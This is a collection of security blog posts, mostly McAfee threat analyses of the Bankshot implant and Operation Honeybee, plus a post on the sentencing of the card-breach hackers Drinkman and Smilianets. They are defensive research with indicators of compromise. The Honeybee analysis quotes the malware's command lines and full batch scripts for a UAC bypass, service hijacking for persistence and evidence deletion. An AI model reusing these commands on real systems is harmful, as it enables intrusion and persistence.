Malware overall. New malware samples increased in Q4 by 32%. The total number of malware samples grew 10% in the past four quarters.

Mac malware. New Mac OS malware samples increased by 24% in Q4. Total Mac OS malware grew 58% in 2017.*

Macro malware. New macro malware increased by 53% in Q4, declined by 35% in 2017.

Spam campaigns. 97% of spam botnet traffic in Q4 was driven by Necurs—recent purveyor of “lonely girl” spam, pump-and-dump stock spam, and Locky ransomware downloaders—and by Gamut—sender of job offer–themed phishing and money mule recruitment emails.

*This blog post has been edited to correct the percentage increase of Mac OS malware in 2017.

For more information on these threat trends and statistics, please visit:

Twitter @Raj_Samani & @McAfee_Labs.

The post ‘McAfee Labs Threats Report’ Examines Cryptocurrency Hijacking, Ransomware, Fileless Malware appeared first on McAfee Blogs.

Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant

This post was prepared with contributions from Asheer Malhotra, Charles Crawford, and Jessica Saavedra-Morales. 

On February 28, the McAfee Advanced Threat Research team discovered that the cybercrime group Hidden Cobra continues to target cryptocurrency and financial organizations. In this analysis, we observed the return of Hidden Cobra’s Bankshot malware implant surfacing in the Turkish financial system. Based on the code similarity, the victim’s business sector, and the presence of control server strings, this attack resembles previous attacks by Hidden Cobra conducted against the global financial network SWIFT.

In this new, aggressive campaign we see a return of the Bankshot implant, which last appeared in 2017. Bankshot is designed to persist on a victim’s network for further exploitation; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations.

Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails containing a malicious Microsoft Word document. The document contains an embedded Adobe Flash exploit, which was recently announced by the Korean Internet Security agency. The exploit, which takes advantage of CVE-2018-4878, allows an attacker to execute arbitrary code such as an implant.

the Further investigation into this campaign and analysis of McAfee product telemetry shows that the infection occurred on March 2 and 3. The implant’s first target was a major government-controlled financial organization. It next appeared in another Turkish government organization involved in finance and trade. A further three large financial institutions in Turkey were victims of this attack. The implant has so far not surfaced in any other sector or country. This campaign suggests the attackers may plan a future heist against these targets by using Bankshot to gather information.

Bankshot implants are distributed from a domain with a name similar to that of the cryptocurrency-lending platform Falcon Coin, but the similarly named domain is not associated with the legitimate entity. The malicious domain falcancoin.io was created December 27, 2017, and was updated on February 19, only a few days before the implants began to appear. These implants are variations of earlier forms of Bankshot, a remote access tool that gives an attacker full capability on a victim’s system. This implant also contains functionality to wipe files and content from the targeted system to erase evidence or perform other destructive actions. Bankshot was first reported by the Department of Homeland Security on December 13, 2017, and has only recently resurfaced in newly compiled variants. The sample we analyzed is 99% similar to the documented Bankshot variants from 2017.

Bankshot implants hosted on falcancoin.io.

The Bankshot implant is attached to a malicious Word document with the filename Agreement.docx. The document appears to be an agreement template for Bitcoin distribution between an unknown individual in Paris and a to-be-determined cryptocurrency exchange. The author of this document is test-pc. It was created February 26 and was submitted from the Netherlands. The document contains an embedded Flash script that exploits CVE-2018-4878 and downloads and executes the DLL implant from falcancoin.io.

We discovered two more documents, written in Korean, that exploit the same vulnerability as Agreement.docx. These documents appear to be part of the same campaign and may have been used on different targets. These documents also communicated with falcancoin.io to install Bankshot and also contain themes around cryptocurrency security.

Two Flash files exploit CVE-2018-4878.

  • 843c17b06a3aee22447f021307909890b68828b9 (February 25)
  • 343ebca579bb888eb8ccb811f9b52280c72e484c (February 25
Malicious documents in the attack.

 

Malicious document exploiting CVE-2018-4878.

The implants are downloaded via a Flash file embedded in the malicious document. They are executed when the victim views the document.

The malicious site falcancoin.io embedded in the Flash file.
Implant directory contained in the malicious Flash file.

The implants (DLLs) are disguised as ZIP files and communicate with three control servers, two of them Chinese-language online gambling sites. These URLs can be found hardcoded in the implants’ code.

Hardcoded control server URLs.

 

Analyzing Bankshot

The sample (a2e966edee45b30bb6bb5c978e55833eec169098) is a Windows DLL that serves as a backdoor and contains a variety of capabilities. The malicious DLL is not a service DLL because it lacks ServiceMain(). To mask itself, it can run as a regular library loaded into a legitimate process.

The malware begins by creating a new thread from the DllMain() function to carry out its malicious activities:

New thread created in the malware’s DllMain() function.

The malware performs the following activities:

  • Builds imports by dynamically loading APIs
  • Decrypts strings needed for control server communications
  • Performs control server communications
  • Handles commands issued by the control server
  • Uninstalls self from the system

The malicious thread dynamically loads the APIs it needs at the beginning of its execution using LoadLibrary() and GetProcAddress(). APIs from the following libraries are loaded at runtime:

  • Kernel32.dll
  • Ws2_32/wsock32.dll
  • Apvapi32.dll
  • Oleaut32.dll
  • Iphlp.dll
  • Urlmon.dll
A dynamic API loaded by the malware.

 

Based on packet capture analysis of previous implants from 2017, the following strings are used in control server communications:

  • Connection: keep-alive
  • Cache-Control: max-age=0
  • Accept: */*
  • Content-Type: multipart/form-data; boundary=
  • Content-Type: application/octet-stream
  • Accept-Encoding: gzip,deflate,sdch
  • Accept-Language: ko-KR -> Korean
  • Content-Disposition: form-data;name=”board_id”
  • Content-Disposition: form-data;name=”user_id”
  • Content-Disposition: form-data;name=”file1″; filename=”img01_29.jpg”
  • Content-Disposition: form-data;name=”file1″; filename=”my.doc”
  • Content-Disposition: form-data;name=”file1″; filename=”pratice.pdf”
  • Content-Disposition: form-data;name=”file1″; filename=”king.jpg”
  • Content-Disposition: form-data;name=”file1″; filename=”dream.avi”
  • Content-Disposition: form-data;name=”file1″; filename=”hp01.avi”
  • Content-Disposition: form-data;name=”file1″; filename=”star.avi”

User Agents

The implant either fetches the user agent from Internet Explorer (using ObtainUserAgentAsString()) or uses a default user agent specified in the malware binary:

Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36

Control Server Communications

The malware initiates communication with the control server by sending it an HTTP POST request with additional optional HTTP data, such as:

------FormBoundary<randomly_generated_characters>
Content-Disposition: form-data; name="board_id"

8306
------FormBoundary<randomly_generated_characters>
Content-Disposition: form-data; name="user_id"

*dJU!*JE&!M@UNQ@
------FormBoundary<randomly_generated_characters>
Content-Disposition: form-data; name="file1"; filename="king.jpg"
Content-Type: application/octet-stream
  • board_id is a four-digit number that may be an identifier for a campaign ID. Based on analysis of previous samples, this is a unique identifier.
  • user_id is a hardcoded value in the malware binary that is sent to the control server. The username appears to be attacker specified and has occurred in 2017 Bankshot samples. This links the previous samples with this unique username.
  • filename is based on static analysis. This looks like a specific beacon to indicate that the malware is ready to receive commands.

The optional HTTP data with king.jpg looks like a beacon to inform the control server that the malware is ready to accept new commands:

  • Commands received from the control server are encoded DWORDs
  • After decoding, these DWORDs should be in the range 123459h to 123490h
Malware checking to make sure a received command is in the correct range.

 

The command index calculator and jump to the appropriate command.

 

The command index table and command handler address table. 

Implant Capabilities

Based on the responses received from the control server, the malware can carry out the following malicious tasks:

  • Recursively generate a list of files in a directory and send to the control server
  • Terminate a specific process. The process is identified by the control server sending the PID to the malware.
The capability to terminate a process.
  • Gather network addresses and operating system version
  • Execute arbitrary commands using “cmd.exe /c”
The capability to execute system commands.

 

Spawning arbitrary processes.
  • Create processes
  • Write responses from the control server to a file
  • Send information for all drives
  • Write data sent by the control server to a temporary file matching the file path pattern %temp%\DWS00*
  • Change the time of a file as specified by the control server
The malware changing the file time.
  • Create a process by impersonating a logged-on user

 

Getting a user token using WTSQueryUserToken.

 

A process created as logged-in user.
  • Gather the process time for all processes
Getting time information for all processes running on the system.
  • Gather domain and account names based on all running processes
Gathering account information from running processes.
  • Read a specified file’s contents and send the data to the control server
  • Write data sent by the control server to an existing file
  • Mark a file to be deleted on reboot
Marking a file for deletion on reboot.
  • Overwrite a file with all zeros and mark it for deletion on reboot
Wiping files with zeros and marking it for deletion on reboot. 
  • Delete files using the DeleteFile() API
  • Load an arbitrary library into its process space. This may be used to load additional downloaded components of the attack.
Loading an arbitrary library into its own process space. 

After every action is performed the malware sends a response to the control server indicating whether the action was successful.

Connections

The US government reports that Bankshot is used by Hidden Cobra to target multiple industries including financial organizations. This implant has been connected to a major Korean bank attack and is also known as Trojan Manuscript. That variant contained the capability to search for hosts related to the SWIFT network and the same control server strings as the variant we found targeting the Turkish financial sector. The implant does not conduct financial transactions; rather it is a channel into the victim’s environment, in which further stages of implants can be deployed for financial reconnaissance. The Bankshot implant was also observed in 2017 in documents appearing to come from Latin American banks.

Malicious document delivering the Bankshot implant in 2017.

These connections, combined with the implant’s nearly identical appearance to known variants, are a strong indication that we have uncovered a Hidden Cobra attack. Further, previous implants from 2017 contained bogus documents with financially themed content.

A code comparison of hash 12c786c490366727cf7279fc141921d8 with hash 6de6a0df263ecd2d71a92597b2362f2c (from November 28, 2017). 

Conclusion

We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey (and possibly other countries). In this campaign, we see the adoption of a recent zero-day Adobe Flash vulnerability to get the implant onto the victim’s systems.

The campaign has a high chance of success against victims who have an unpatched version of Flash. Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal. This is the first time that Bankshot has been tied directly to financial-related hacking and the first time it has been used since November 2017.

McAfee detects these threats as:

  • RDN/Generic Exploit
  • RDN/Generic.dx
  • Generic PWS.y
  • Generic.hbg
  • Exploit-CVE2018-4878

McAfee customers are also covered by McAfee Global Threat Intelligence Web Reputation classification, which rate these URLs as High Risk.

 

Indicators of Compromise

MITRE ATT&CK techniques

  • Exfiltration over command and control channel
  • Commonly used port
  • Command-line interface
  • Service execution
  • Automated collection
  • Data from local system
  • Process discovery
  • System time discovery
  • Credential dumping
  • Exploitation of vulnerability
  • Process injection
  • File deletion

Hashes

  • 650b7d25f4ed87490f8467eb48e0443fb244a8c4
  • 65e7d2338735ec04fd9692d020298e5a7953fd8d
  • 166e8c643a4db0df6ffd6e3ab536b3de9edc9fb7
  • a2e966edee45b30bb6bb5c978e55833eec169098

Domains

  • 530hr[dot]com/data/common.php
  • 028xmz[dot]com/include/common.php
  • 168wangpi[dot]com/include/charset.php
  • Falcancoin[dot]io

 

The post Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant appeared first on McAfee Blogs.

McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups

This post was written with contributions from Jessica Saavedra-Morales, Thomas Roccia, and Asheer Malhotra. 

McAfee Advanced Threat Research analysts have discovered a new operation targeting humanitarian aid organizations and using North Korean political topics as bait to lure victims into opening malicious Microsoft Word documents. Our analysts have named this Operation Honeybee, based on the names of the malicious documents used in the attacks.

Advanced Threat Research analysts have also discovered malicious documents authored by the same actor that indicate a tactical shift. These documents do not contain the typical lures by this actor, instead using Word compatibility messages to entice victims into opening them.

The Advanced Threat Research team also observed a heavy concentration of the implant in Vietnam from January 15–17.

Background

On January 15, Advanced Threat Research discovered an operation using a new variant of the SYSCON backdoor. The Korean-language Word document manual.doc appeared in Vietnam on January 17, with the original author name of Honeybee.

Document properties.

This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON, which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea–related topics. The malicious Visual Basic script uses a unique key (custom alphabet) to encode data. We have seen this in previous operations using SYSCON. This key was also used in the Honeybee campaign and appears to have been used since August 2017.

Examples of decoy documents.

Several additional documents surfaced between January 17 and February 3. All contain the same Visual Basic macro code and author name as Honeybee. Some of the malicious documents were test files without the implant. From our analysis, most these documents were submitted from South Korea, indicating that some of the targeting was in South Korea. These Honeybee documents did not contain any specific lures, rather variations of a “not compatible” message attempting to convince the user to enable content.

We also observed a related malicious document created January 12 by the author Windows User that contained a different encoding key, but essentially used the same macro and same type of implant as we saw with the recent Honeybee documents. This document, “International Federation of Red Cross and Red Crescent Societies – DPRK Country Office,” drops an implant with the control server address 1113427185.ifastnet.org, which resolves to the same server used by the implants dropped in the Honeybee case.

The directory contents of control server 1113427185.ifastnet.org.

The directory contents of ftp.byethost11.com, from Honeybee samples.

 

Log files of compromised machines from February 2018 Honeybee samples.

MaoCheng Dropper

Aside from finding the malicious documents, the Advanced Threat Research team discovered a Win32-based executable dropper. This dropper uses a stolen digital signature from Adobe Systems. This certificate is also used by another Korean-language malware compiled January 16 (hash: 35904f482d37f5ce6034d6042bae207418e450f4) with an interesting program database (PDB) path.

D:\Task\DDE Attack\MaoCheng\Release\Dropper.pdb

The malware is a Win32 executable that pretends to be a Word document based on its icon. This is a dropper for the same type of malware as observed with the other Word documents. This sample also dropped a decoy document with the author name Honeybee. This sample, however, contained a bug that interfered with the execution flow of the dropper, suggesting that the authors did not test the malware after code signing it.

The decoy document uses the cloud-based accounting software company Xero as a lure:

A decoy document from MaoCheng dropper.

Possible Operator

The Advanced Threat Research team has identified the following persona (snoopykiller@mail.ru) tied to this recent operation. Based on our analysis, the actor registered two free hosting accounts: navermail.byethost3.com, which refers to the popular South Korean search engine, and nihon.byethost11.com. The email address was used to register a free account for a control server in all the implants described in our analysis. 

Technical Analysis

Let’s start with an overview of the attack:

We continue with the components involved in this operation.

The malicious Word file is the beginning of the infection chain and acts as a dropper for two DLL files. The Word file contains malicious Visual Basic macro code that runs when the document is opened in Word using the Document_Open() autoload function. The word file also contains a Base64-encoded file (encoded with a custom key) in it that is read, decoded, and dropped to the disk by the macro.

The Document_Open() subroutine implementing the malicious functionality.

The Visual Basic macro performs the following tasks:

  • Opens a handle to the malicious document to read the encoded CAB file
  • Decodes the CAB file and writes it to the disk at %temp%\setup.cab

Encoded CAB file in the Word document.

Decoding and writing the CAB file to %temp%.

The decoded CAB file in the Visual Basic memory buffer.

The CAB file contains the following files and functions:

  • dll: A malicious DLL used to launch batch files (used with cliconfg.exe for UAC bypass). The DLL contains the following PDB path: D:\Task\MiMul\NTWDBLIB\Release\NTWDBLIB.pdb.
  • bat: A batch file to set up the service COMSysApp, for an x64 system
  • bat: A batch file to set up the service COMSysApp, for an x86 system
  • ini: A data file with Base64-encoded data for connecting to an FTP server. Credentials are encoded in the .ini file.

Decoded credential data contained in ipnet.ini. 

  • dll: The malicious DLL file run as a service (using svchost.exe). The DLL contains the following PDB path: D:\Task\MiMul\FTPCom_vs10\Release\Engine.pdb.
  • The macro then extracts the CAB file into %systemroo%\system32, using either wusa.exe or expand.exe (depending on the OS) to again bypass UAC prompts
  • Once the files have been extracted, the Visual Basic macro deletes the CAB file and runs the malicious NTWDBLIB.dll via cliconfg.exe (to gain privileges and bypass UAC protections)
  • Command lines used by the Visual Basic macro:
cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe
cmd /c expand %TEMP%\setup.cab -F:* %SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe

A combination of NTWDBLIB.dll and cliconfg.exe are used to bypass UAC protections; this is a familiar attack on Windows. UAC bypass via DLL hijacking requires:

  • A Windows executable with the auto-elevate property in its manifest
  • A Windows executable in a secure directory (%systemroot%\system32)

The malicious NTWDBLIB DLL performs the simple task of setting up the malicious ipnet.dll as a service by running one of the two batch files contained in the CAB file (which is also dropped to %systemroot%\system32):

NTWDBLIB executing the installer batch files under the context of cliconfg.exe. 

The batch files involved in the attack modify the system service COMSysApp to load the malicious ipnet.dll. The contents of the batch files vary depending on the OS (x64 vs x86):

install1.bat (x64)

@echo off
sc stop COMSysApp
sc config COMSysApp type= own start= auto error= normal binpath= "%windir%\SysWOW64\svchost.exe -k COMSysApp"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v COMSysApp /t REG_MULTI_SZ /d "COMSysApp" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\COMSysApp\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%windir%\SysWOW64\ipnet.dll" /f
sc start COMSysApp
del /f /q %windir%\SysWOW64\install2.bat
del /f /q %windir%\SysWOW64\install1.bat

install2.bat (x86)

@echo off
sc stop COMSysApp
sc config COMSysApp type= own start= auto error= normal binpath= "%windir%\System32\svchost.exe -k COMSysApp"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v COMSysApp /t REG_MULTI_SZ /d "COMSysApp" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\COMSysApp\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%windir%\system32\ipnet.dll" /f
sc start COMSysApp
del /f /q %windir%\System32\install1.bat
del /f /q %windir%\System32\install2.bat

The batch files perform these tasks:

  • Stop the service COMSysApp
  • Configure the service to autostart (to set up persistence on the system)
  • Modify registry keys to launch the DLL unser svchost.exe
  • Specify the malicious DLL path to be loaded into the svchost process.
  • Immediately restart the service
  • Remove the batch files to reduce the fingerprint on the system 

IPNet.dll runs as a service under svchost.exe.

The malicious DLL is also responsible for terminating the cliconfg.exe process and deleting the malicious NTWDBLIB.dll using:

cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL

All the following capabilities described are implemented by the malicious service DLL implant unless specified.  

Variant using North Korean Red Cross

Another variant (hash: 9e2c0bd19a77d712055ccc0276fdc062e9351436) of the malicious Word dropper uses the same Base64-decoding scheme with a different custom key. This document was created January 10.

Contents of the decoy document.

This variant also consists of two CAB files that are dropped to %temp%, depending on the OS (x86 or x64).

The key differences in this variant:

  • Two CAB files are encoded into the Word document in text boxes instead of being appended in the DOC file
  • There is one CAB file for an x86 system and another for an x64 system
  • This malware sample uses uacme.exe with dummy.dll to implement the UAC bypass
    • exe is the program vulnerable to the UAC bypass attack
    • dll runs install.bat to set up the service (same as NTWDBLIB.dll)
  • exe and dummy.dll may be either 64-bit or 32-bit binaries based on the OS. Ipnet.dll may also be either 64-bit or 32-bit.
  • The Visual Basic macro uses the following command line:
cmd /c expand %TEMP%\setup.cab -F:* %TEMP% && cd /d %TEMP% && del /f /q setup.cab && uacme.exe
  • The control server credential information contained in the CAB files is different:

Decoded credential data contained in another ipnet.ini.

Similarities between this variant and the original malware sample:

  • Service name is the same: COMSysApp
  • The DLL and ini files contain the same functions as described elsewhere in this post

Data Reconnaissance

The following information is gathered from the endpoint and sent to the control server.

  • System info:
    • Computer name
    • System info using: cmd /c systeminfo >%temp%\temp.ini
    • List of currently running process using: cmd /c tasklist >%temp%\temp.ini

Exfiltration

  • The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern:

From <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt. For example, From <COMPUTER-NAME> (01-04 11-40-02).txt

  • All the text files are now packed into the archive temp.zip (%temp%\temp.zip)
  • zip is Base64 encoded (with a custom key, same as that used in the malicious document) and then copied to post.txt
  • txt is uploaded to the control server

Additional Commands and Capabilities

The service-based DLL implant traverses to the /htdocs/ directory on the FTP server and looks for any files with the keywords:

  • TO EVERYONE: Commands issued to all infected endpoints
  • TO <COMPUTERNAME>: Commands issued to endpoints matching the ComputerName

The following commands are supported by the malware implant:

  • cmd /c pull <filename>: Adds filename to temp.zip, Base64 encodes, and uploads to control server
  • cmd /c chip <string>: Deletes current ipnet.ini config file. Writes new config info (control server connection info) to new ipnet.ini.
  • cmd /c put <new_file_name> <existing_file_name>: Copies existing file to new file name. Deletes existing file.
  • /user <parameters>: Executes downloaded file with parameters specified using CreateProcessAsUser
  • cmd /c <command>: Executes command on infected endpoint 

Conclusion 

The actor behind Honeybee has been operating with new implants since at least November 2017 with the first known version of NTWDBLIB installer. Furthermore, based on the various metadata in both documents and executables, the actor is likely a Korean speaker.

The techniques used in the malicious documents such as the lure messages closely resemble what we have observed before in South Korea. The attacker appears to target those involved in humanitarian aid and inter-Korean affairs. We have seen this operation expand beyond the borders of South Korea to target Vietnam, Singapore, Argentina, Japan, Indonesia, and Canada.

Based on the McAfee Advanced Threat Research team’s analysis, we find multiple components from this operation are unique from a code perspective, even though the code is loosely based on previous versions of the SYSCON backdoor. Some new droppers have not been observed before in the wild. The MaoCheng dropper was apparently created specifically for this operation and appeared only twice in the wild.

 

Indicators of compromise

MITRE ATT&CK techniques

  • Modify existing service
  • Code signing
  • File deletion
  • Deobfuscate/decode files or information
  • System information discovery
  • Process discovery
  • Service execution
  • RunDLL32
  • Scripting
  • Command-line Interface
  • Data from local system
  • Automated exfiltration
  • Data encrypted
  • Commonly used port
  • Bypass user account control

Hashes

  • fe32d29fa16b1b71cd27b23a78ee9f6b7791bff3
  • f684e15dd2e84bac49ea9b89f9b2646dc32a2477
  • 1d280a77595a2d2bbd36b9b5d958f99be20f8e06
  • 19d9573f0b2c2100accd562cc82d57adb12a57ec
  • f90a2155ac492c3c2d5e1d83e384e1a734e59cc0
  • 9b832dda912cce6b23da8abf3881fcf4d2b7ce09
  • f3b62fea38cb44e15984d941445d24e6b309bc7b
  • 66d2cea01b46c3353f4339a986a97b24ed89ee18
  • 7113aaab61cacb6086c5531a453adf82ca7e7d03
  • d41daba0ebfa55d0c769ccfc03dbf6a5221e006a
  • 25f4819e7948086d46df8de2eeeaa2b9ec6eca8c
  • 35ab747c15c20da29a14e8b46c07c0448cef4999
  • e87de3747d7c12c1eea9e73d3c2fb085b5ae8b42
  • 0e4a7c0242b98723dc2b8cce1fbf1a43dd025cf0
  • bca861a46d60831a3101c50f80a6d626fa99bf16
  • 01530adb3f947fabebae5d9c04fb69f9000c3cef
  • 4229896d61a5ad57ed5c247228606ce62c7032d0
  • 4c7e975f95ebc47423923b855a7530af52977f57
  • 5a6ad7a1c566204a92dd269312d1156d51e61dc4
  • 1dc50bfcab2bc80587ac900c03e23afcbe243f64
  • 003e21b02be3248ff72cc2bfcd05bb161b6a2356
  • 9b7c3c48bcef6330e3086de592b3223eb198744a
  • 85e2453b37602429596c9681a8c58a5c6faf8d0c

Domains

  • ftp.byethost31.com
  • ftp.byethost11.com
  • 1113427185.ifastnet.org
  • navermail.byethost3.com
  • nihon.byethost3.com

The post McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups appeared first on McAfee Blogs.

Drinkman and Smilianets Sentenced: The End to Our Longest Databreach Saga?

On Thursday, February 15, 2018, we may have finally reached the end of the Albert Gonzalez Databreach Saga.  Vladimir Drinkman, age 37, was sentenced to 144 months in prison, after pleading guilty before U.S. District Judge Jerome Simandle in New Jersey.  His colleague, Dmitriy Smilianets, age 34, had also pleased guilty and was sentenced to 51 months and 21 days in prison (which is basically "time served", so he'll walk immediately).  The pair were actually arrested in the Netherlands on June 28, 2012, and the guilty pleas had happened in September 2015th after they were extradited to New Jersey.

Those who follow data breaches will certainly be familiar with Albert Gonzalez, but may not realize how far back his criminal career goes.

On July 24, 2003, the NYPD arrested Gonzalez in front of a Chase Bank ATM at 2219 Broadway found Gonzalez in possession of 15 counterfeit Chase ATM cards and $3,000 in cash. (See case 1:09-cr-00626-JBS).  After that arrest, Gonzalez was taken under the wing of a pair of Secret Service agents, David Esposito and Steve Ward.  Gonzalez describes some of the activities he engaged in during his time as a CI in his 53 page appeal that he files March 24, 2011 from his prison cell in Milan, Michigan.

At one point, he claims that he explained to Agent Ward that he owed a Russian criminal $5,000 and he couldn't afford to pay it.  According to his appeal, he claims Ward told him to "Go do your thing, just don't get caught" and that Agent Ward later asked him if he had "handled it." Because of this, Gonzalez (who again, according to his own sentencing memo, likely has Asperger's) claims he believed that he had permission to hack, as long as he didn't get caught.

Over Christmas 2007, Gonzalez and his crew hacked Heartland Payments Systems and stole around 130 million credit and debit cards.  He was also charged with hacking 7-Eleven (August 2007), Hannaford Brothers (November 2007) where he stole 4.2 million credit and debit cards. Two additional data breaches against "Company A" and "Company B" were also listed as victims.  In Gonzalez's indictment, it refers to "HACKER 1 who resided in or near Russia" and "HACKER 2 who resided in or near Russia."  Another co-conspirator "PT" was later identified as Patrick Toey, a resident of Virginia Beach, VA.  (Patrick Toey's sentencing memorandum is a fascinating document that describes his first "Cash out trip" working for Albert Gonzalez in 2003. Toey describes being a high school drop out who smoked marijuana and drank heavily who was "put on a bus to New York" by his mother to do the cash out run because she needed rent money.  Toey later moved in with Gonzalez in Miami, where he describes hacking Forever 21 "for Gonzalez" among other hacks.

Gonzalez's extracurricular activities caught up with him when Maksym Yastremskiy (AKA Maksik) was arrested in Turkey.  Another point of Gonzalez's appeal was to say that Maksik was tortured by Turkish police, and that without said torture, he never would have confessed, which would have meant that Gonzalez (then acting online as "Segvec") would never have been identified or arrested.  Gonzalez claims that he suffered from an inadequate defense, because his lawyer should have objected to the evidence "obtained under torture."  These charges against Gonzalez were tried in the Eastern District of New York (2:08-cr-00160-SJF-AKT) and proved that Gonzalez was part of the Dave & Buster's data breach

On December 15, 2009, Gonzalez tried to shrug off some of his federal charges by filing a sentencing memo claiming that he lacked the "capacity to knowingly evaluate the wrongfulness of his actions" and asserting that his criminal behavior "was consistent with description of the Asperger's discorder" and that he exhibited characteristics of "Internet addiction."  Two weeks later, after fighting that the court could not conduct their own psychological exam, Gonzalez signed a guilty plea, agreeing that the prosecutor would try to limit his sentence to 17 years. He is currently imprisoned in Yazoo, Mississippi (FBOP # 25702-050) scheduled to be released October 29, 2025.

Eventually "HACKER 1" and "HACKER 2" were indicted themselves in April 2012, with an arrest warrant issued in July 2012, but due to criminals still at large, the indictment was not unsealed until December 18, 2013. HACKER 1 was Drinkman.  HACKER 2 was Alexandr Kalinin, who was also indicted with Drinkman and Smilianets.

Shortly after the Target Data Breach, I created a presentation called "Target Data Breach: Lessons Learned" which drew heavily on the history of Drinkman and Smilianets. Some of their documented data breaches included:
VictimDateDamages
NASDAQMay 2007  loss of control
7-ELEVEN August 2007
Carrefour October 2007 2 million cards
JCPenneyOctober 2007
HannafordNovember 2007 4.2 million cards
Wet SealJanuary 2008
CommideaNovember 2008 30 million cards
Dexia Bank BelgiumFeb'08-Feb'09
Jet BlueJan'08 to Feb '11
Dow Jones2009
EuroNetJul '10 to Oct '11  2 million cards
Visa JordanFeb-Mar '11  800,000 cards
Global Payments SystemsJan '11 to Mar '12
Diners Club SingaporeJun '11
IngenicardMar '12 to Dec '12

During the time of these attacks, Dimitry Smilianets was also leading the video game world.  His team, The Moscow 5, were the "Intel Extreme Masters" champions in the first League of Legends championship, also placing in the CounterStrike category.   Smilianets turned out not to be the hacker, but rather specialized in selling the credit cards that the other team members stole.  Steal a few hundred million credit cards and you can buy a nice gaming rig!

Smilianets with his World Champion League of Legends team in 2012

 How did these databreaches work?


Lockheed Martin's famous paper "Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains" laid out the phases of an attack like this:

But my friend Daniel Clemens had explained these same phases to me when he was teaching me the basics of Penetration Testing years before when he was first starting Packet Ninjas!

1. External Recon - Gonzalez and his crew scan for Internet-facing SQL servers
2. Attack (Dan calls this "Establishing a Foothold") - using common SQL configuration weaknesses, they caused a set of additional tools to be downloaded from the Internet
3. Internal Recon - these tools included a Password Dumper, Password Cracker, Port Scanner,  and tools for bulk exporting data
4. Expand (Dan calls this "Creating a Stronghold")  - usually this consisted with monitoring the network until they found a Domain Admin userid and password.  (for example, in the Heartland Payments attack, the VERITAS userid was found to have the password "BACKUP" which unlocked every server on the network!
5. Dominate - Gonzalez' crew would then schedule an SQL script to run a nightly dump their card data
6. Exfiltrate - data sent to remote servers via an outbound FTP.

In Rolling Stone, Gonzalez claims he compromised more than 250 networks
In the Rolling Stone article, "Sex, Drugs, and the Biggest Cybercrime of All Time" , Steven Watt, who was charged in Massachusetts for providing attack tools to Gonzalez in October 2008.  Watt's tools were used in breaches, including BJ's Wholesale Club, Boston Market, Barnes & Noble, Sports Authority, Forever 21, DSW, and OfficeMax.  As part of his sentencing, Watt was ordered to repay $171.5 Million dollars.

Almost all of those databreaches followed the same model ... scan, SQL Inject, download tools, plant a foothold, convert it to a stronghold by becoming a domain admin, dominate the network, and exfiltrate the data. 

How did the TARGET Data breach happen, by the way?  Target is still listed as being "Unsolved" ...   but let's review.  An SQL injection led to downloaded tools, (including NetCat, PSExec, QuarksPWDump, ElcomSoft's Proactive Password Auditor, SomarSoft's DumpSec, Angry IP Scanner (for finding database servers), and Microsoft's OSQL and BCP (Bulk Copy)), a Domain Admin password was found (in Target's case, a BMC server monitoring tool running the default password), the POS Malware was installed, and data exfiltration begun. 

Sound familiar???

Justice?

With most of Gonzalez's crew in prison by 2010, the data breaches kept right on coming, thanks to Drinkman and Smilianets. 

Drinkman, the hacker, was sentenced to 144 months in prison.
Smilianets, the card broker, was sentenced to 51 months and 21 days, which was basically "time served" -- he was extradited to the US on September 7, 2012, so he'll basically walk.

Will Smilianets return to video gaming? to money laundering? or perhaps choose to go straight?

Meanwhile, Alexandr Kalinin, of St. Petersburg, Russia; Mikhail Rytikov, of Odessa, Ukraine; and Roman Kotov, of Moscow, Russia, are all still at large.  Have they learned from the fate of their co-conspirators? or are they in all likelihood, scanning networks for SQL servers, injecting them, dropping tools, planting footholds, creating strongholds, and exfiltrating credit card data from American companies every day?

Kalinin (AKA Grig, AKA "g", AKA "tempo") is wanted for hacking NASDAQ and planting malware that ran on the NASDAQ networks from 2008 to 2010.  (See the indictment in the Southern District of New York, filed 24JUL2013 ==> 1:13-cr-00548-ALC )

Mykhailo Sergiyovych Rytikov is wanted in the Western District of Pennsylvania for his role in a major Zeus malware case.  Rytikov leased servers to other malware operators.  Rytikov is also indicted in the Eastern District of Virginia along with Andriy DERKACH for running a "Dumps Checking Service" that processed at least 1.8 million credit cards in the first half of 2009 and that directly led to more than $12M in fraud.  ( 1:12-cr-00522-AJT filed 08AUG2013.)  Rytikov did have a New York attorney presenting a defense in the case -- Arkady Bukh argues that while Rytikov is definitely involved in web-hosting, he isn't responsible for what happens on the websites he hosts.

Roman Kotov, and Rytikov and Kalinin, are still wanted in New Jersey as part of the case 1:09-cr-00626-JBS (Chief Judge Jerome B. Simandle ). This is the same case Drinkman and Smilianets were just sentenced under.

Inside the Capabilities and Detection of UDPoS Malware

